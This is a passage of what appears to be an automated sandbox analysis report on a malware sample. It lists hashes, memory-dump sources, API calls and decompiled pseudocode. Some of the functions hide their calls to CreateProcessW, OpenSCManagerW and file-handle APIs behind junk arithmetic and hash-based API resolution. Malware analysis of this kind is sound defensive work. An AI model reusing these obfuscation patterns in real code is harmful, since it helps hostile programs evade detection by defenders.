                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fd5e2020dddf03e1e7ca74319f7ec4fe3c9db80b422aa4455661d4e1faf2030
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64119EB1808B889FD320CF68C900747BBE8EF19714F008A5ED499C3B80D7B5A504CBA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,6F22BB81,?,zO"o,6F24D0FC,6F24D0FC,6F224F7A), ref: 6F22B925
                                                                                                                                                                                                                    • GetACP.KERNEL32(00000000,6F22BB81,?,zO"o,6F24D0FC,6F24D0FC,6F224F7A), ref: 6F22B93C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: zO"o
                                                                                                                                                                                                                    • API String ID: 0-616525808
                                                                                                                                                                                                                    • Opcode ID: c371318f7fd24e4fa245c92c64b5369b1176d4e7617c18fa73cbf42cdae95320
                                                                                                                                                                                                                    • Instruction ID: e2e2b93cdaed6e813dfc14c153dc7b60b0fd17d84efaf436ff69b1d5a00cf48a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c371318f7fd24e4fa245c92c64b5369b1176d4e7617c18fa73cbf42cdae95320
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0F0C23090460A8FDB00EB68C44C7A837B1BB0233AF940348EA389A9D0C7B15868CF40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 6F2019B5
                                                                                                                                                                                                                      • Part of subcall function 6F2151C1: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6F2151CD
                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6F2019DE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                                    • API String ID: 1846318660-2556327735
                                                                                                                                                                                                                    • Opcode ID: f40c0df8d89f8d77ad6d8768245032e3af8a117a9a36c85565a28e09f7c19850
                                                                                                                                                                                                                    • Instruction ID: 86d5126d7a502077b6acf5d1a2fa04c326bc4d6a29ca7dc954f078056927aebe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f40c0df8d89f8d77ad6d8768245032e3af8a117a9a36c85565a28e09f7c19850
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61E086F291031D5BC614DF98DC01845B7DDEE565143108526E64497600E77194908BA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F207B30: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6F249194), ref: 6F207B35
                                                                                                                                                                                                                      • Part of subcall function 6F207B30: GetLastError.KERNEL32(?,00000000,00000000,?,6F249194), ref: 6F207B3F
                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,6F20117F), ref: 6F216FDC
                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6F20117F), ref: 6F216FEB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6F216FE6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                    • API String ID: 3511171328-631824599
                                                                                                                                                                                                                    • Opcode ID: 05d671de75679030d85444d5e02e8ab49026256bf4333ab83e07510832559f0d
                                                                                                                                                                                                                    • Instruction ID: f22f4e682590fbbc6115733117b1e1d24bb360146e256a637b462b6f50647188
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05d671de75679030d85444d5e02e8ab49026256bf4333ab83e07510832559f0d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6E065B2504B594FD730EF29C448346BBE1AF03354F00486DE596D6A40DBB5D454CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • InitializeCriticalSectionEx.KERNEL32(6F24D300,00000000,00000000), ref: 6F201063
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6F20106D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalErrorInitializeLastSection
                                                                                                                                                                                                                    • String ID: @T$o$
                                                                                                                                                                                                                    • API String ID: 3413597225-1000098340
                                                                                                                                                                                                                    • Opcode ID: eb6d189f2f54255ebb7ded7bb229ef60f2df1c2242faed0c91317bc42492e6e8
                                                                                                                                                                                                                    • Instruction ID: 731c08780a0fe95a5e76d710729e930ede826f6c9e6460ecc6795fa0bbd8ff37
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb6d189f2f54255ebb7ded7bb229ef60f2df1c2242faed0c91317bc42492e6e8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7E092B224C74A86E724EB21CA0DB517AA25B4331DF900408DAC1CD881D7F9D0B4DF69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008,00000000,6F21221B), ref: 6F2172C5
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 6F2172CC
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F217312
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 6F217319
                                                                                                                                                                                                                      • Part of subcall function 6F21715E: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6F217308,00000000), ref: 6F217182
                                                                                                                                                                                                                      • Part of subcall function 6F21715E: HeapAlloc.KERNEL32(00000000), ref: 6F217189
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1864747095-0
                                                                                                                                                                                                                    • Opcode ID: bdc15818417d736d76c5a0b2ce998f753944299ba6d677a89222e39dd168c461
                                                                                                                                                                                                                    • Instruction ID: 79054dc17b3b761ecce12578587193e9dbb277d93223c004bf56556e09090f2b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdc15818417d736d76c5a0b2ce998f753944299ba6d677a89222e39dd168c461
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F096B3A4CB1657CB2556BCEC0C98B3BA69FC3B617014119F945D6644DF608451CF54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    C-Code - Quality: 33%
                                                                                                                                                                                                                    			E0301A342(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, int _a12, intOrPtr _a20, intOrPtr _a28, struct _STARTUPINFOW* _a40, WCHAR* _a44, intOrPtr _a52, intOrPtr _a56, struct _PROCESS_INFORMATION* _a60) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v16;
                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                                    				WCHAR* _t48;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a60);
                                                                                                                                                                                                                    				_t48 = __ecx;
                                                                                                                                                                                                                    				_push(_a56);
                                                                                                                                                                                                                    				_push(_a52);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a44);
                                                                                                                                                                                                                    				_push(_a40);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a28);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a20);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E0301C6D8(_t33);
                                                                                                                                                                                                                    				_v20 = 0xe77ed2;
                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                    				_v12 = 0xc32920;
                                                                                                                                                                                                                    				_t42 = 0x46;
                                                                                                                                                                                                                    				_v12 = _v12 / _t42;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0003aaee;
                                                                                                                                                                                                                    				_v8 = 0xe3b22a;
                                                                                                                                                                                                                    				_v8 = _v8 + 0xffff15b6;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x00e8652f;
                                                                                                                                                                                                                    				E0301E554(0xa45f1f5c, 0x9f993dc3, 0x61);
                                                                                                                                                                                                                    				_t40 = CreateProcessW(_t48, _a44, 0, 0, _a12, 0, 0, 0, _a40, _a60); // executed
                                                                                                                                                                                                                    				return _t40;
                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                    0x0301a34a
                                                                                                                                                                                                                    0x0301a34f
                                                                                                                                                                                                                    0x0301a351
                                                                                                                                                                                                                    0x0301a354
                                                                                                                                                                                                                    0x0301a357
                                                                                                                                                                                                                    0x0301a358
                                                                                                                                                                                                                    0x0301a35b
                                                                                                                                                                                                                    0x0301a35e
                                                                                                                                                                                                                    0x0301a35f
                                                                                                                                                                                                                    0x0301a360
                                                                                                                                                                                                                    0x0301a363
                                                                                                                                                                                                                    0x0301a364
                                                                                                                                                                                                                    0x0301a367
                                                                                                                                                                                                                    0x0301a368
                                                                                                                                                                                                                    0x0301a36b
                                                                                                                                                                                                                    0x0301a36e
                                                                                                                                                                                                                    0x0301a372
                                                                                                                                                                                                                    0x0301a373
                                                                                                                                                                                                                    0x0301a378
                                                                                                                                                                                                                    0x0301a381
                                                                                                                                                                                                                    0x0301a384
                                                                                                                                                                                                                    0x0301a390
                                                                                                                                                                                                                    0x0301a39b
                                                                                                                                                                                                                    0x0301a39e
                                                                                                                                                                                                                    0x0301a3a5
                                                                                                                                                                                                                    0x0301a3ac
                                                                                                                                                                                                                    0x0301a3b3
                                                                                                                                                                                                                    0x0301a3c7
                                                                                                                                                                                                                    0x0301a3e1
                                                                                                                                                                                                                    0x0301a3e8

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00E77ED2,00000000,00000000,00000000,?,?), ref: 0301A3E1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                                                    • String ID: /e
                                                                                                                                                                                                                    • API String ID: 963392458-4252541474
                                                                                                                                                                                                                    • Opcode ID: 495cc109e5d6bacb0bf9c9752aa838be4aea0d45c222a50da2587a216de52034
                                                                                                                                                                                                                    • Instruction ID: 0b3478e689a2521964c4349d5178566d979fce9de64a2d3bda4476c5fd692f0c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 495cc109e5d6bacb0bf9c9752aa838be4aea0d45c222a50da2587a216de52034
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43110732900248BBDF219F96DC09CDF7FBAEFCA710F045148FA1866160D3728A60DBA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                    			E03001DD9(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				E0301C6D8(_t33);
                                                                                                                                                                                                                    				_v12 = 0x963fa;
                                                                                                                                                                                                                    				_t45 = 0x14;
                                                                                                                                                                                                                    				_v12 = _v12 * 0x60;
                                                                                                                                                                                                                    				_t46 = 0x6c;
                                                                                                                                                                                                                    				_v12 = _v12 / _t45;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x002a9d3b;
                                                                                                                                                                                                                    				_v8 = 0x477ded;
                                                                                                                                                                                                                    				_t17 =  &_v8; // 0x477ded
                                                                                                                                                                                                                    				_v8 =  *_t17 / _t46;
                                                                                                                                                                                                                    				_v8 = _v8 | 0xaa0dc455;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x678693b6;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xcd804184;
                                                                                                                                                                                                                    				_t42 = E0301E554(0xa45f1f5c, 0x6901adca, 0x234);
                                                                                                                                                                                                                    				_t43 =  *_t42(_a20, 0, _a12, 0x28, __ecx, 0, _a4, 0x28, _a12, _a16, _a20, __ecx, __ecx); // executed
                                                                                                                                                                                                                    				return _t43;
                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                    0x03001def
                                                                                                                                                                                                                    0x03001df4
                                                                                                                                                                                                                    0x03001e03
                                                                                                                                                                                                                    0x03001e06
                                                                                                                                                                                                                    0x03001e0e
                                                                                                                                                                                                                    0x03001e0f
                                                                                                                                                                                                                    0x03001e14
                                                                                                                                                                                                                    0x03001e1e
                                                                                                                                                                                                                    0x03001e25
                                                                                                                                                                                                                    0x03001e2f
                                                                                                                                                                                                                    0x03001e37
                                                                                                                                                                                                                    0x03001e3e
                                                                                                                                                                                                                    0x03001e45
                                                                                                                                                                                                                    0x03001e57
                                                                                                                                                                                                                    0x03001e69
                                                                                                                                                                                                                    0x03001e6e

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 03001E69
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHandleInformation
                                                                                                                                                                                                                    • String ID: }G
                                                                                                                                                                                                                    • API String ID: 3935143524-2518173460
                                                                                                                                                                                                                    • Opcode ID: d0d1db2056905d93579c223208f0b35fe5cce159240cb4b3c403fdebc7384876
                                                                                                                                                                                                                    • Instruction ID: 851ae2826998361a3609c1c0329e245cf7ee3a72aaa05a5c2864705f239eb796
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0d1db2056905d93579c223208f0b35fe5cce159240cb4b3c403fdebc7384876
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E115E35A41208FFEF04DFA4CC46BDEBFB6EB44300F108089F5056A190DBB16B609B41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                    			E030169E0(void* __ecx, int __edx, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				short* _v16;
                                                                                                                                                                                                                    				short* _v20;
                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                    				int _t42;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_t42 = __edx;
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E0301C6D8(_t26);
                                                                                                                                                                                                                    				_v24 = 0x2b9117;
                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                    				_v12 = 0x12ce2;
                                                                                                                                                                                                                    				_t36 = 0x18;
                                                                                                                                                                                                                    				_v12 = _v12 / _t36;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x000cc6ea;
                                                                                                                                                                                                                    				_v8 = 0x3367a1;
                                                                                                                                                                                                                    				_v8 = _v8 << 0xa;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x5a;
                                                                                                                                                                                                                    				_v8 = _v8 << 2;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x26e646e7;
                                                                                                                                                                                                                    				E0301E554(0x19016132, 0x2b4f8963, 0xc4);
                                                                                                                                                                                                                    				_t34 = OpenSCManagerW(0, 0, _t42); // executed
                                                                                                                                                                                                                    				return _t34;
                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                    0x030169e8
                                                                                                                                                                                                                    0x030169ed
                                                                                                                                                                                                                    0x030169ef
                                                                                                                                                                                                                    0x030169f0
                                                                                                                                                                                                                    0x030169f3
                                                                                                                                                                                                                    0x030169f4
                                                                                                                                                                                                                    0x030169f6
                                                                                                                                                                                                                    0x030169fb
                                                                                                                                                                                                                    0x03016a04
                                                                                                                                                                                                                    0x03016a07
                                                                                                                                                                                                                    0x03016a0a
                                                                                                                                                                                                                    0x03016a16
                                                                                                                                                                                                                    0x03016a21
                                                                                                                                                                                                                    0x03016a24
                                                                                                                                                                                                                    0x03016a2b
                                                                                                                                                                                                                    0x03016a32
                                                                                                                                                                                                                    0x03016a44
                                                                                                                                                                                                                    0x03016a47
                                                                                                                                                                                                                    0x03016a4b
                                                                                                                                                                                                                    0x03016a58
                                                                                                                                                                                                                    0x03016a63
                                                                                                                                                                                                                    0x03016a6a

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,22BB2AF0,?,?,?,?,?,AFE5505B,?,00000000), ref: 03016A63
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                                                                                                    • String ID: F&
                                                                                                                                                                                                                    • API String ID: 1889721586-1534117860
                                                                                                                                                                                                                    • Opcode ID: 0c408a3f259fa958841d6dfb2d964c5a9e40b5bc238b1f9c550f7aab6dcd3a33
                                                                                                                                                                                                                    • Instruction ID: 9ea7d38284a567571b979b3fc07243d9467550618fac872bae25db7d9abf3737
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c408a3f259fa958841d6dfb2d964c5a9e40b5bc238b1f9c550f7aab6dcd3a33
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31015775D01208BBDB14DFAACD49CDFBFB8EF81714F208099E509AB210D6B04B55DBA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                                                                                    			E030047F4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, long _a16) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_t34 = __edx;
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E0301C6D8(_t24);
                                                                                                                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                    				_v24 = 0x155b6d;
                                                                                                                                                                                                                    				_v12 = 0x29e235;
                                                                                                                                                                                                                    				_v12 = _v12 >> 7;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0003711b;
                                                                                                                                                                                                                    				_v8 = 0xe31ce7;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x54;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x4a8f6f8e;
                                                                                                                                                                                                                    				E0301E554(0xa45f1f5c, 0xbd05952e, 0x71);
                                                                                                                                                                                                                    				_t30 = RtlAllocateHeap(_t34, _a12, _a16); // executed
                                                                                                                                                                                                                    				return _t30;
                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                    0x030047fb
                                                                                                                                                                                                                    0x030047fe
                                                                                                                                                                                                                    0x03004800
                                                                                                                                                                                                                    0x03004803
                                                                                                                                                                                                                    0x03004806
                                                                                                                                                                                                                    0x03004809
                                                                                                                                                                                                                    0x0300480b
                                                                                                                                                                                                                    0x03004810
                                                                                                                                                                                                                    0x03004817
                                                                                                                                                                                                                    0x03004820
                                                                                                                                                                                                                    0x03004827
                                                                                                                                                                                                                    0x0300482e
                                                                                                                                                                                                                    0x03004832
                                                                                                                                                                                                                    0x03004839
                                                                                                                                                                                                                    0x0300484b
                                                                                                                                                                                                                    0x0300484e
                                                                                                                                                                                                                    0x0300485b
                                                                                                                                                                                                                    0x0300486a
                                                                                                                                                                                                                    0x03004870

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000,00155B6D,?,?,?,?,?,?,0301C7A1,00000002), ref: 0300486A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                    • String ID: 5)
                                                                                                                                                                                                                    • API String ID: 1279760036-4230242353
                                                                                                                                                                                                                    • Opcode ID: 08ca9ee852af87af507ffb63bdabd67148544f0b24655b38b4d15c6b40a5b056
                                                                                                                                                                                                                    • Instruction ID: 9c72bc429e9021b087f9aad53b7252284b1aa3eb53ec18098b4ae49acafafa22
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08ca9ee852af87af507ffb63bdabd67148544f0b24655b38b4d15c6b40a5b056
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE011AB6C0120CBBCF15DF94D9499DEBFB5EF44314F108498F91966250D3718B249BA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                    			E0301CCCE(void* __ecx, void* __edx, void* _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                    				char _t33;
                                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				E0301C6D8(_t26);
                                                                                                                                                                                                                    				_v12 = 0x545710;
                                                                                                                                                                                                                    				_t35 = 0x4c;
                                                                                                                                                                                                                    				_v12 = _v12 / _t35;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0008333e;
                                                                                                                                                                                                                    				_v8 = 0x75e35a;
                                                                                                                                                                                                                    				_v8 = _v8 << 2;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x03f0f0a8;
                                                                                                                                                                                                                    				_v8 = _v8 << 8;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x277bd69c;
                                                                                                                                                                                                                    				E0301E554(0xa45f1f5c, 0x72e550ff, 0x4e);
                                                                                                                                                                                                                    				_t33 = RtlFreeHeap(_a8, 0, _a4); // executed
                                                                                                                                                                                                                    				return _t33;
                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                    0x0301ccd3
                                                                                                                                                                                                                    0x0301ccd6
                                                                                                                                                                                                                    0x0301ccd9
                                                                                                                                                                                                                    0x0301ccdd
                                                                                                                                                                                                                    0x0301ccdf
                                                                                                                                                                                                                    0x0301cce4
                                                                                                                                                                                                                    0x0301ccf2
                                                                                                                                                                                                                    0x0301ccfd
                                                                                                                                                                                                                    0x0301cd00
                                                                                                                                                                                                                    0x0301cd07
                                                                                                                                                                                                                    0x0301cd0e
                                                                                                                                                                                                                    0x0301cd12
                                                                                                                                                                                                                    0x0301cd19
                                                                                                                                                                                                                    0x0301cd1d
                                                                                                                                                                                                                    0x0301cd31
                                                                                                                                                                                                                    0x0301cd41
                                                                                                                                                                                                                    0x0301cd46

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,0008333E,?,?,?,?,00000000), ref: 0301CD41
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.841044428.0000000003000000.00000040.00000010.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                    • String ID: Zu
                                                                                                                                                                                                                    • API String ID: 3298025750-2241568114
